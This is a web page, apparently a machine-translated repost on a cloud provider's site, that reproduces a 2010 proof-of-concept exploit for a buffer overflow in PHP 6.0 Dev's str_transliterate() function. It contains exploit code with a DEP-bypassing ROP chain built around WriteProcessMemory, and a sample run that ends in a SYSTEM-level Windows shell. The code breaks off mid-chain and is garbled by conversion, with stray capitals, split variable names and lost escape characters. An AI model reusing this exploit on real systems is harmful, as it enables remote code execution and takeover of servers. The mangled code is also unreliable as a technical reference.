Home > Cloud Computing > Cloud Security

PHP 6.0 Dev str_transliterate () Buffer overflow-& amp;

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Test method:

The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! <? Php
/*
04-06-2010 PHP 6.0 Dev str_transliterate () 0Day Buffer Overflow Exploit
Tested on Windows 2008 SP1 DEP alwayson
Matteo Memelli aka ryujin (AT) offsec.com
Original sploit: http://www.exploit-db.com/exploits/12051 (Author: Pr0T3cT10n)
 
Thx to muts and Elwood for helping ;)
 
Bruteforce script is attached in base64 format.
 
Root @ bt :~ #./Brute_php6.py 172.16.30.249/pwnPhp6.php win2k8
(*) Php6 str_transliterate () bof | ryujin # offsec.com
(*) Bruteforcing WPM ret address...
(+) Trying base address 0x78000000
(+) Trying base address 0x77000000
(+) Trying base address 0x76000000
(+) Trying base address 0x75000000
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
 
C: wampinapacheApache2.2.11> whoami
Whoami
Nt authoritysystem
*/
 
Error_reporting (0 );
 
$ Base_s = $ _ GET [pos_s];
$ Base_e = $ _ GET [pos_e];
$ Off_s = $ _ GET [off_s];
$ Off_e = $ _ GET [off_e];
 
If (ini_get_bool (unicode. semantics )){
$ Buff = str_repeat ("u4141", 32 );
$ Tbp = "u2650u6EE5"; // 6EE52650 ADDRESS TO BE PATCHED BY WPM
$ Ptw = "u2FE0u6EE5"; // 6EE52FE0 POINTER FOR WRITTEN BYTES
$ Ret = "u2660u6EE5"; // 6EE52660 RET AFTER WPM
$ Wpmargs = $ ret. "uFFFFuFFFF". $ tbp. "uffffuffffuffff". $ ptw; // WPM ARGS
$ Garbage = "$ wpm =" \ u ". strtoupper (sprintf ("% 02 s", dechex ($ off_s ))). strtoupper (sprintf ("% 02 s", dechex ($ off_e ))).
"\ U ". strtoupper (sprintf ("% 02 s", dechex ($ base_s ))). strtoupper (sprintf ("% 02 s", dechex ($ base_e ))). "";";
Eval ($ garbage );
$ Nops = str_repeat ("u9090", 41 );
 
// TH | ROP-> Try Harder or Rest On Pain ;)
// GETTING SHELLCODE ABSOLUTE ADDRESS
$ Rop = "u40ddu6FF2"; // mov eax, EBP/pop esi/pop ebp/pop ebx/RETN 6FF240DD
$ Rop. = "u00002u00002"; // JUNK POPPED IN EBP
$ Rop. = "u00002u00002"; // JUNK POPPED IN EBP
$ Rop. = "u00002u00002"; // JUNK POPPED IN EBP
$ Rop. = "u5DD4u6EE6"; // pop ecx/RETN 6EE65DD4
$ Rop. = "uFDBCuFFFF"; // value to be popped in ecx (REL. offset to shellcode) FFFFFDBC
$ Rop. = "u222Bu6EED"; // add eax, ECX/pop ebx/pop ebp/RETN 6EED222B
$ Rop. = "u2650u6EE5"; // junk popped in ebp (ret to shellcode)
$ Rop. = "u2650u6EE5"; // junk popped in ebp (ret to shellcode)
 
// PATCHING BUFFER ADDY ARG FOR WPM
$ Rop. = "u1C13u6EE6"; // add dword ptr ds: [EAX], EAX/RETN 6EE61C13
 
// Getting num bytes in register 0x1A0 (len of shellcode)
$ Rop. = "uE94Eu6EE6"; // mov edx, ECX/pop ebp/RETN 6EE6E94E
$ Rop. = "u00002u00002"; // JUNK POPPED IN EBP
$ Rop. = "u5DD4u6EE6"; // pop ecx/RETN 6EE65DD4
$ Rop. = "uFF5CuFFFF"; // value to be popped in ecx ffff5c
$ Rop. = "uE94Cu6EE6"; // sub ecx, EDX/mov edx, ECX/pop ebp/RETN 6EE6E94C
$ Rop. = "u00002u00002"; // JUNK POPPED IN EBP
 
// PATCHING NUM BYTES TO BE COPIED ARG FOR WPM
$ Rop. = "u0C54u6EE7"; // mov dword ptr ds: [EAX + 4], ECX/pop ebp/RETN 6EE70C54
$ Rop. = "u00002u00002"; // JUNK POPPED IN EBP
 
// REALIGNING ESP TO WPM AND RETURNING TO IT
$ Rop. = "u8640u6EE6"; // add eax,-30/pop ebp/RETN 6EE68640
$ Rop. = "u00002u00002"; // JUNK POPPED IN EBP
$ Rop. = "u29F1u6EE6"; // add eax, 0C/pop ebp/RETN 6EE629F1
$ Rop. = "u00002u00002"; // JUNK POPPED IN EBP
$ Rop. = "u29F1u6EE6"; // add eax, 0C/pop ebp/RETN 6EE629F1
$ Rop. = "u00002u00002"; // JUNK POPPED IN EBP
$ Rop. = "u10ADu6FC3"; // inc eax/RETN 6FC310AD
$ Rop. = "u10ADu6FC3"; // inc eax/RETN 6FC310AD
$ Rop. = "u10ADu6FC3"; // inc eax/RETN 6FC310AD
$ Rop. = "u10ADu6FC3"; // inc eax/RETN 6FC310AD
$ Rop. = "u10ADu6FC3"; // inc eax/RETN 6FC310AD
$ Rop. = "u10ADu6FC3"; // INC E

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More